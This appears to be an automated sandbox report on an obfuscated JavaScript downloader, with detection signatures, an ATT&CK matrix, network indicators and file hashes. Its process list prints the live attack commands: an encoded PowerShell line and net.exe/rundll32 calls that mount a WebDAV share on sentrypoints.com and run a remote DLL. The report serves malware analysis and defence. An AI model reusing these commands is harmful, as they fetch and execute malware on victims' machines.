Windows
Analysis Report
1997614539972622565.js
Overview
General Information
Detection
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7340 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\19976 1453997262 2565.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7392 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -EncodedCo mmand bgBl AHQAIAB1AH MAZQAgAFwA XABzAGUAbg B0AHIAeQBw AG8AaQBuAH QAcwAuAGMA bwBtAEAAOA A4ADgAOABc AGQAYQB2AH cAdwB3AHIA bwBvAHQAXA AgADsAOwA7 ADsAOwA7AD sAOwAgAHIA dQBuAGQAbA BsADMAMgAg AFwAXABzAG UAbgB0AHIA eQBwAG8AaQ BuAHQAcwAu AGMAbwBtAE AAOAA4ADgA OABcAGQAYQ B2AHcAdwB3 AHIAbwBvAH QAXAAyADIA OQAyADUAMg AyADQANwAz ADMAMAAxAD IANwAuAGQA bABsACwARQ BuAHQAcgB5 AA== MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7400 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - net.exe (PID: 7556 cmdline:
"C:\Window s\system32 \net.exe" use \\sent rypoints.c om@8888\da vwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - rundll32.exe (PID: 7592 cmdline:
"C:\Window s\system32 \rundll32. exe" \\sen trypoints. com@8888\d avwwwroot\ 2292522473 30127.dll, Entry MD5: EF3179D498793BF4234F708D3BE28633)
- cleanup
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition |
Source: | Child: | ||
Source: | Child: |
Networking |
---|
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Static file information: |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Code function: | 1_2_00007FFD9B6E09C9 |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 21 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | 11 Non-Standard Port | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 21 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 12 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
sentrypoints.com | 94.159.113.48 | true | true | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false |
| unknown | ||
false |
| unknown | ||
false | unknown | |||
false | unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
94.159.113.48 | sentrypoints.com | Russian Federation | 49531 | NETCOM-R-ASRU | true |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1543762 |
Start date and time: | 2024-10-28 12:02:45 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 2m 26s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 5 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 1997614539972622565.js |
Detection: | MAL |
Classification: | mal84.troj.spyw.expl.evad.winJS@8/3@1/1 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Execution Graph export aborted for target powershell.exe, PID 7392 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- VT rate limit hit for: 1997614539972622565.js
Time | Type | Description |
---|---|---|
07:03:40 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
94.159.113.48 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
NETCOM-R-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 0.773832331134527 |
Encrypted: | false |
SSDEEP: | 3:NlllulM/l:NllU |
MD5: | 21F14205CCD420521F20158797DD550F |
SHA1: | 69A2950F28967FFF781C85FAFDC91F49E1E2A624 |
SHA-256: | D021F470AB6D211BC08B4DF10B4FD039E582C5BA57F371828643329F9F76E7DE |
SHA-512: | 8858DF0A62E1FD3D2300CB5A4CF32A15762DDA3EE77DCE440F5382163EAA1A1973704DB2EA6C7D1BFF31C8BAF5F657791595D458BA4A7710FA453CB15833E0D7 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
File type: | |
Entropy (8bit): | 4.712544117334504 |
TrID: | |
File name: | 1997614539972622565.js |
File size: | 1'424'760 bytes |
MD5: | 1d5eeb78265b9887d284bf08d25c3368 |
SHA1: | f0203afcf43febcb307812d19c6a010ad194a26d |
SHA256: | 96f7a1602553aaa0f38091bee8055114416a460c7ada60e856ca0882bbbd4127 |
SHA512: | 9426512c01e77282922e2c028dee0c2558bf18abd142afc8e50e9b64cc4ad1b12f2a46b91fe91f23a2d7a2bb711f4c4d21214e6a338023a294d44d4edc056e20 |
SSDEEP: | 24576:IYSWUi932Xw+Vm8sIocNdC5IdEddd6WwsIocNdC5IdEH6yGW:IhQYI5IocNd+Id0ddtVIocNd+IdU6yGW |
TLSH: | D4657EAB650BCEFEAD149D98461B3F5208BCD831A922E558750B10D6C7BD0F60EB391F |
File Content Preview: | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkbivgpppaplynswowrgmspvkzjukvpewgghfjoyqkumqvzbcheokrgnezbszpgppolqrpftgussjdteshhfqdnescyvykmfajryzhyujuegsluthkwnuiisqlyswgtuckluworiqkaionxqvrngaknciprvktsdv |
Icon Hash: | 68d69b8bb6aa9a86 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 28, 2024 12:03:40.409460068 CET | 49730 | 8888 | 192.168.2.4 | 94.159.113.48 |
Oct 28, 2024 12:03:40.414921045 CET | 8888 | 49730 | 94.159.113.48 | 192.168.2.4 |
Oct 28, 2024 12:03:40.414998055 CET | 49730 | 8888 | 192.168.2.4 | 94.159.113.48 |
Oct 28, 2024 12:03:40.415709019 CET | 49730 | 8888 | 192.168.2.4 | 94.159.113.48 |
Oct 28, 2024 12:03:40.421129942 CET | 8888 | 49730 | 94.159.113.48 | 192.168.2.4 |
Oct 28, 2024 12:03:41.313864946 CET | 8888 | 49730 | 94.159.113.48 | 192.168.2.4 |
Oct 28, 2024 12:03:41.367795944 CET | 49730 | 8888 | 192.168.2.4 | 94.159.113.48 |
Oct 28, 2024 12:03:41.390045881 CET | 49730 | 8888 | 192.168.2.4 | 94.159.113.48 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 28, 2024 12:03:40.392374992 CET | 56923 | 53 | 192.168.2.4 | 1.1.1.1 |
Oct 28, 2024 12:03:40.403871059 CET | 53 | 56923 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Oct 28, 2024 12:03:40.392374992 CET | 192.168.2.4 | 1.1.1.1 | 0xbd34 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Oct 28, 2024 12:03:40.403871059 CET | 1.1.1.1 | 192.168.2.4 | 0xbd34 | No error (0) | 94.159.113.48 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49730 | 94.159.113.48 | 8888 | 7556 | C:\Windows\System32\net.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 28, 2024 12:03:40.415709019 CET | 110 | OUT | |
Oct 28, 2024 12:03:41.313864946 CET | 191 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 07:03:37 |
Start date: | 28/10/2024 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6244c0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 07:03:37 |
Start date: | 28/10/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 07:03:37 |
Start date: | 28/10/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 07:03:39 |
Start date: | 28/10/2024 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff737730000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 07:03:40 |
Start date: | 28/10/2024 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6494f0000 |
File size: | 71'680 bytes |
MD5 hash: | EF3179D498793BF4234F708D3BE28633 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
1 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
2 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
3 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
4 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
5 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
6 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
7 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
8 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
9 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
10 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
11 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
12 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
13 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
14 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
15 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
16 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
17 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
18 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
19 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
20 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
21 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
22 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
23 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
24 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
25 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
26 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
27 | wizqpoxlyewqsllzerjyhohippmmxytzmyprnahxvjhgiyfxcfpgszlnfoihnjqsodbavvctssfsclogjzwhlnsbsbdbtfpkb... | |
